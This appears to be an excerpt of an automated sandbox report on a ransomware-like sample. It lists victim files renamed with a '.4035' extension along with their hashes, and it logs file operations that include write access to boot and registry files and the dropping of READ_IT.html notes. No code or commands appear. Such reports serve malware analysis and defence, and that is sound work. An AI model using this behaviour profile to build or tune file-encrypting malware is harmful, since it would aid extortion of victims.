c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\temp\bst7f0e.tmp.4035	1.80 KB (1840 bytes)	MD5: 1595c1fd12efd81e300b0b316c2a7f80 SHA1: ff94141e49ffdea1f5123869c283465db59b15b6 SHA256: d4cbc9d5bbc81b1aa4fddb3a186b321474a4177cf02d1e1cef53e97d2877d67a	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\temp\bst7f4c.tmp.4035	1.80 KB (1840 bytes)	MD5: a959ff300a430f682f53826748c04b28 SHA1: a214da01fd62d8ba73b62a3bee02e33bc9eb70aa SHA256: 5e84781772d9d8ea5fe7f41d4d2aac4623c36f6dd88f33243531a54189312c02	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\temp\cvrc37d.tmp.cvr.4035	1.80 KB (1840 bytes)	MD5: 484e65ba897c3ffaac6b21e0da819d7a SHA1: d6e8c7f7c136d4ca380ef553cbe6ae349db220b3 SHA256: 6c4d812678347239c53c4a391b4ccbc799d2972ca707698d9417e394ba982efb	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\temp\cvrc503.tmp.cvr.4035	1.80 KB (1840 bytes)	MD5: 578d433fd7e8cc233b9c54b82a56a206 SHA1: 429acb9273f865a8556f4d5b5b7d6ad3b3900488 SHA256: c6fe2668014d09c695bf685bd72b084329eb5bed11463784745c8b9b3096d4e7	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\temp\rd8cf3.tmp.4035	1.80 KB (1840 bytes)	MD5: cfbb6b9e0e523bc34f28085668ecf75d SHA1: 7b667c824155950f7eb577150a12e81f72160c1e SHA256: 638a65e56855727763adfa454672ae610a49c42841181810dac42bf50b573f80	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\temp\scoped_dir_2624_27680\crx_install\_locales\uk\messages.json.4035	1.80 KB (1840 bytes)	MD5: fea47969cfef20b7a2c2f13f37f7e8c8 SHA1: 33551865760306767cafb03964ce78edb6c023aa SHA256: 4e55bb8b6c43333a26c25d52400eb1eca4426424e518aa5d5117f73c305384f2	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\safebrowsing\goog-phish-shavar.sbstore.4035	667.18 KB (683197 bytes)	MD5: 9bc2fbad96b13bc14533a7ac3481f380 SHA1: 46c5c7c565a0032954b4ea9e5000e3c72b21b596 SHA256: 414d937bb34a0c5c1c7232f9aaa569516f25f8d4e593a3301f96d1dfbff63394	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\safebrowsing\test-malware-simple.cache.4035	0.97 KB (992 bytes)	MD5: 46c6f9d9394a473408e1e5670cd6fb91 SHA1: 4e65501612b3294b503fd89c2b1030fb9fb0f060 SHA256: 7218420f11d2f06a21d42f3c5191147a0d7e3ffe7627e748a904252174fc1b0e	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\safebrowsing\test-malware-simple.pset.4035	0.94 KB (960 bytes)	MD5: fcfe191acb9be70da2690a82eb23b082 SHA1: 6211de4c86223359a1fd9fc5f01d4ded6e4249f6 SHA256: c9886595d795ee09df9b957660beb7c983cb40b45113b26c9770c2a3b0d2a120	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\safebrowsing\test-malware-simple.sbstore.4035	1.16 KB (1184 bytes)	MD5: 8959f5e244c1a70a28095d23d9e9d003 SHA1: be77258579eee53bfc07d30a65fec42997659714 SHA256: 73d3e2a827e52df97f69f5fdc8bbd2e316ab26ed52b1dc2250edf77d3c7587f7	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\safebrowsing\test-phish-simple.cache.4035	0.97 KB (992 bytes)	MD5: ccd484072158c92840a38c0b7196e3c9 SHA1: 15b2fcde68f95487e1c3590cb665fd6db33a2eb4 SHA256: 8137a75d300d5ddd7f84bb0010fd1d3bb364806d08480127403604b307c743d3	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\safebrowsing\test-phish-simple.pset.4035	0.94 KB (960 bytes)	MD5: f14c093eff6ed6672cd28b89f014b41c SHA1: 84430a468e014fdff4eec2d25d5469075d25e1a0 SHA256: dc7c094e12b89e0e3d81c6ae5092c40d00aac24611f0170fe4b548eb4f04d70d	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\safebrowsing\test-phish-simple.sbstore.4035	1.16 KB (1184 bytes)	MD5: a4331a5cfbd3798213f8f97bd1cb8c06 SHA1: bce304bc3f8517fb468e5f3101d9dfa51fa3abe5 SHA256: 1c72367a887f7c3e759a3696232191500e1b57670a64a27a07792dd02ae63e01	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\offlinecache\index.sqlite.4035	256.92 KB (263088 bytes)	MD5: 4550680d2b011e5abd4bcfe0fa446725 SHA1: 79c3cb32f742b6e7950bcbff136fd61a22f79d16 SHA256: ff79a14efb93121b48d4fa3c9ac349449a01d0aeea885d2a62ceb565bc20680c	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\cache\_cache_001_.4035	4.00 MB (4195248 bytes)	MD5: 28d83c9ff5df42b60b5a83823becacac SHA1: 600ec16174497375fafa3f33df71a61b3e04890c SHA256: da4468e5b2af778f99253b84b9463e667dabfc9dac61c4ff2cf8c72a5eca41d1	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\cache\f\a2\70853d01.4035	47.07 KB (48195 bytes)	MD5: d2a6abd4312d5d22f4236b2b5f062a46 SHA1: 3f3702eb795d29c1ad275beb782371a6157211df SHA256: 57dc4627ab6d8f65f114b270deca6f08c2e9304ab8e3a8811c465ed6f56dd877	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\cache\f\94\c3f14d01.4035	43.43 KB (44469 bytes)	MD5: 82b63fb4f52809e67d98705287219c7c SHA1: 4bdda72f4223781c2bec1e2e9ca20569cf711650 SHA256: a74140b462a36d5671506a6aee96f4c32fb14d7729a472baf9274565c1ec1547	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\cache\f\23\7e0fed01.4035	63.05 KB (64568 bytes)	MD5: 7c86e06806ad8037645b4601a845baa6 SHA1: 1d18d1119704fd48f490ff669307145a15f7c24f SHA256: 00e47f9d8125f5b8e79a1b368a1a62d765e96143b82df234634def2db10936b2	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\cache\e\e9\1a006d01.4035	29.35 KB (30051 bytes)	MD5: 744d1f071cef2745ba66b48fcae18d29 SHA1: df0600a65df3145a65458c107e386dc5c985a961 SHA256: ecb8d2a0e570cf6c5913e170a29d86130b8ce42b5cbc3de2be43277e7bf5bf76	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\cache\e\69\885eed01.4035	68.22 KB (69856 bytes)	MD5: b629e0fa7fa712645a838eb680a00f54 SHA1: 07592df7b300f9e05e977748eb25cb625eb70aa5 SHA256: 0fc50308b8ebe93bc4822adcae20fbbe6a0be4985cd3784d583478f9b80801ef	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\cache\e\57\c6b34d01.4035	43.01 KB (44045 bytes)	MD5: d4e02f6723499836062beba674331786 SHA1: 49d58e85d7638d4e68938e224d61a0f72924e372 SHA256: 09746b7908ca5861a694c6730821d16b3606c629d42c481f91c7efedfcf8d58c	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\cache\e\45\c6466d01.4035	32.48 KB (33260 bytes)	MD5: d495e926278f7b196a5e14864c3418af SHA1: 05127534a616516a43128d22ebdbcfa1c109e369 SHA256: 4b2f2253c24fa2dacb710ffe4c6fe9066dfcd2d56fbf8e02e5e8cdf57ec95e3e	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\cache\d\fe\a0c36d01.4035	28.90 KB (29595 bytes)	MD5: 9264559a782a7368708dd64a6f507afb SHA1: bf6e89779f39664fe7fc8ada358f2b1b7d915412 SHA256: 2bdd7c1ca0173e2a0acb0aab3f720e20248319177c1561e31a4f6904fb043196	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\cache\d\08\71469d01.4035	33.53 KB (34336 bytes)	MD5: 6e5b1a664bd33e091a2e0c00f0a2df97 SHA1: 8cb167c3f82b62fa754572405ce0d5b18b71b807 SHA256: e7e8eeec361adf0f27c1057a0b30e6404ba4b135bb13c5be16ffd76c407350f9	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\cache\d\07\1f307d01.4035	68.03 KB (69664 bytes)	MD5: 543c1e2fd98388f52d7cfa913e30bd41 SHA1: c82baf8382879319fd85130244be94a176dd704d SHA256: 6874c7992fe214bece34bf7dc2a89616dfb9ac6eca0eba9de31723de4091ef65	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\cache\c\7f\996b5d01.4035	83.31 KB (85312 bytes)	MD5: 4c14934627de0c168f8dda751a517c96 SHA1: 85043214226509e2cc390f087b09809f5c71774a SHA256: f08a7a6bc5035c16013e3462163a008302135b4d70b024bd2c239cdad41b0475	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\cache\c\1f\7adbdd01.4035	32.58 KB (33358 bytes)	MD5: 490c13ea8221d569acf7030440a5877a SHA1: 802341d9a9854d16020509bc390dcd7cef806120 SHA256: 2c846778e739462af23c221d55c0303d89f65c2c7a8cc36c0b2c18ba07606ad6	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\cache\b\e5\9a8d1d01.4035	18.73 KB (19184 bytes)	MD5: fbb484d90f8bb3d0f8d6754fbe0446cf SHA1: 00354876418ff01eef10b84416fe6a6420aa9f58 SHA256: 0e27282a368801ab952b8e095d0e9ab5b7c2e88b6f54b51a6a2c5996a9a14cf8	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\cache\b\64\37abbd01.4035	109.19 KB (111815 bytes)	MD5: 0364fe0ee6a1533e68f3bb077a8a5b39 SHA1: 92daa283b0dd48bf546cb4e8a3714c1d067d6d44 SHA256: dd93715b0d15e8250df269b01b04f635d7fd659a6bf83199bf1cc88aaba3ae15	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\cache\a\ce\65483d01.4035	141.47 KB (144863 bytes)	MD5: edd6be295507e9b1796bc0caa77f9d81 SHA1: 7ad5c83785b116faf082294a75d8e38c8cf788e7 SHA256: 45701e43c77e4cbd2c06cc36bd0a4678732e412130e51bd4db771585afb4d72a	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\cache\a\ae\cf1aed01.4035	18.16 KB (18592 bytes)	MD5: e91d487f1118a8526a1574b54372aacb SHA1: 8ebe20efc7b3deff8f39a7ee0b02e304b623d458 SHA256: 581b2cd4c723bbfae4bde1cb85c1e0d80712706b84a5d55968b89f873d9b98a0	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\cache\9\fd\57344d01.4035	42.94 KB (43967 bytes)	MD5: 09844b1d6c7d267f2d14b5cb31f0c6de SHA1: f3d2f5bd0425a4a33da5c1fe52638776a9491984 SHA256: 8ec7c1cbe6fcbb275f60c085e3400fe9d01eaebd9e4746b92ecf6c9371a507ec	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\cache\9\e0\f17b2d01.4035	17.02 KB (17424 bytes)	MD5: 54833d22ea4f562c702b49d22e42bab3 SHA1: 75593b4332171edf57b17b8aeb27271b85225c0e SHA256: cc211200681d38fbff07316a7f579db5d60ebb98bcf51bcd57c8e0b3975dcb30	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\cache\9\c3\6dbc9d01.4035	41.01 KB (41995 bytes)	MD5: c1192cd23d6b2513bfecaff25bfa629a SHA1: 2eb3ac358a3416bd253b55fc0730265737266253 SHA256: 6aa652b4556f10a09c99a136bcb8961f446b284a60e7c82dd9fb4db2a1e1f74f	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\cache\9\8d\2b984d01.4035	128.34 KB (131423 bytes)	MD5: 934730c50bede06b9854a8eabe30a99e SHA1: e30872953d21381f3cda0cd43e90ebab0fe44afd SHA256: 43f0dcb1e7717b5892359644c3525dcb1c821729dec55e638c99eba5c094036f	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\cache\9\49\38779d01.4035	104.98 KB (107495 bytes)	MD5: 20cad58d2bf3603fee4bbe78a0b4d934 SHA1: 76713825e00843b318e0081f5ec1cd42867bd5b7 SHA256: 205de34bf5c1a6c64f1239c397ee89afc44799a039cae112dc5e6e9bc7116faf	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\cache\9\2c\24b53d01.4035	77.88 KB (79749 bytes)	MD5: 914ad8365380b4ba14e6b59f146c938b SHA1: a0cff935dce08552ec65e860027fd86bf24dbe20 SHA256: 3baecc491eebe5c21f0466da81b7f9d86c3c2ebeb27e38e041fb352a5557c0f7	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\cache\9\10\16a09d01.4035	21.75 KB (22272 bytes)	MD5: 07b994c0e6e3969a6f9306c05993d8a2 SHA1: 9ccda6ff5b2f74348d124bf33c862e6313661c22 SHA256: 5fef7a1b43f75feb78cabb625c2bcfa4ce03a8c0e3813501d5fef59d0273eabc	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\cache\8\ae\93407d01.4035	84.80 KB (86832 bytes)	MD5: 3f10828d89f11e9f574a93c26ae7a52e SHA1: b21518131a31d6f579d04bd077d88e875dd3fbdb SHA256: 17095f46413455e61ee32b533212f40e30282f47f9eaf5ee97814f52ec0ee4cf	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\cache\8\67\68348d01.4035	160.48 KB (164335 bytes)	MD5: e4c6eaef5d54c4937541a43a4bb2b5e9 SHA1: 83813374d258cf2abf4a1f31e6a959040a258fea SHA256: 1e5acb0a106dcfd4a93d2e5c627b7cae608cf29c652c4f77536df32dcc9d7e1c	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\cache\7\26\90eebd01.4035	82.12 KB (84096 bytes)	MD5: 89ac43e65060e5acd25f44849813e572 SHA1: 0eab4f17b992b72157d954bc10b3a0b92482b9fd SHA256: e9634443ddfa834de2c38c55937420e3419acb7eabcf22c52b44e258477de1c7	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\cache\5\f1\c8c27d01.4035	21.50 KB (22016 bytes)	MD5: 5f895fba2c0b4e908c031b45f6be3643 SHA1: a1bfd386e46df6da995e0244752f74eb6aa0a9e1 SHA256: 4802e2864162788b66930bb748382adef8faf0c15ddacb74c5cd4ee33763caf5	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\cache\5\1b\2561dd01.4035	18.73 KB (19184 bytes)	MD5: cfc4ef74cc193a569041458ea1e7687f SHA1: 11edc6a6f811dcb5199393687998dfce79be8e49 SHA256: 37f5b010f837e6d26fc54c38e3c0a848a9365c34bfedb12ec1000ff4f28faeaf	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\cache\4\ee\95599d01.4035	17.33 KB (17744 bytes)	MD5: 1ed06795e57dec8bb5ee5d25320f02dd SHA1: a81309e45e73ff15806c6dd0e6f78c5e6d4a3823 SHA256: b60072c78f57b723476ea0821ad9edbd90e5f95ab2ae91c01bded9069c2f2091	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\cache\4\20\cfa2fd01.4035	57.28 KB (58654 bytes)	MD5: 50e8e2fffb7089628d75cc669ec4509d SHA1: fc0b322070b26869e019288cb18b21145dc7f29b SHA256: 2557474a1dcf1807d30ce768e9bcce2a10ae658f2f2ae18f2be062e57853e670	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\cache\3\da\2555ed01.4035	19.11 KB (19568 bytes)	MD5: 60360426a9984ba7d88095a93ef9b6e5 SHA1: 3cdd30b40fc1816e59011fe852bc4b85127255be SHA256: 85200bbe0dddab048b1dfd8f84a2a39bcb90ce9f20c2359162cc2de8bb53bbf7	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\cache\2\bc\a59c0d01.4035	30.16 KB (30887 bytes)	MD5: ca5a6ac5822cd239a0b9fa2396223fec SHA1: e5db29d8add7a8f43fc4a4c828c5fd11032c0947 SHA256: 22df7449b763facdfaf1cc00127a1f5ce56987c1fde62f6e0bac334dc0b03656	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\cache\2\59\dd6b0d01.4035	42.34 KB (43352 bytes)	MD5: 9cfaf264088c0167325d4ddb38b2eb3e SHA1: ac02d54e9fdf3f1e72eee8d9c59146740884be85 SHA256: 1cce8dce830d2732c6f0fec190d734b419efe1a74926587767f5649f53bfee0d	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\cache\1\f6\cbd4dd01.4035	42.43 KB (43451 bytes)	MD5: c6d2d8c7a3fd124b3feeeb61b024e962 SHA1: 0c0c05fabe6b3c8ce130935e4fcbb8e72a9eb930 SHA256: d0e1b044017020b314a2d6ea33fd6ba2ed571343b0a130b72999251679d2d7ae	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\cache\1\e4\3c9ecd01.4035	18.91 KB (19360 bytes)	MD5: 67edf4842a7770c34fbe723599839873 SHA1: 35b7b718409480178b6dd55a8cfc829f793a371a SHA256: c5773c4b4b2417e1c330965e97c79993de9f42d37ab236efff225df22e9ad9ed	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\cache\1\14\bcc16d01.4035	47.18 KB (48316 bytes)	MD5: 61a511096fc26e2462ea7293eba9c952 SHA1: 51d31f92db82c59d9d60236e710886ed0c1dceba SHA256: fac6c976586f6697e2e7f1914085d474d43b0cd39a618f94062694ac8a2e03eb	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\local\mozilla\firefox\profiles\5cb79syl.default\cache\1\0c\642bbd01.4035	2.02 MB (2117376 bytes)	MD5: 42be1a3a798bb3951167b369e70b53bd SHA1: 781dcd6bccfe14eb07049b8206eeb286a146feb9 SHA256: 55a6e0ec32e89270bbd4dd2fd5d5e70d517d5494e7739eb6a8aa1e96cdf85437	File Actions Show Properties Download

Host Behavior

File (8187)

Operation	Filename	Additional Information	Count	Logfile
Create	C:\Users\Public\{846ee340-7039-11de-9d20-806e6f6e6963}	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\bootmgr	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\BOOTSECT.BAK	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\hiberfil.sys	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\pagefile.sys	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\NTUSER.DAT	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\ntuser.dat.LOG1	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\ntuser.dat.LOG2	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\ntuser.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\My Shapes\Favorites.vss	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Mozilla\Firefox\Profiles\5cb79syl.default\parent.lock	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Mozilla\Firefox\Profiles\5cb79syl.default\indexedDB\moz-safe-about+home\.metadata	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Mozilla\Firefox\Profiles\5cb79syl.default\indexedDB\moz-safe-about+home\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Roaming\Adobe\Acrobat\10.0\JavaScripts\glob.js	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\IconCache.db	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\AdobeARM.log	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\bst2635.tmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\bst28B4.tmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\bst2960.tmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\bst2F3A.tmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\bst4105.tmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\bst423D.tmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\bst4558.tmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\bst47F7.tmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\bst531E.tmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\bst5511.tmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\bst5994.tmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\bst5CBF.tmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\bst7953.tmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\bst7F0E.tmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\bst7F4C.tmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\CVRC37D.tmp.cvr	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\CVRC503.tmp.cvr	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\FXSAPIDebugLogFile.txt	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\RD8CF3.tmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\scoped_dir_2624_27680\CRX_INSTALL\_locales\uk\messages.json	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\AppData\Local\Temp\scoped_dir_2624_27680\CRX_INSTALL\_locales\uk\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
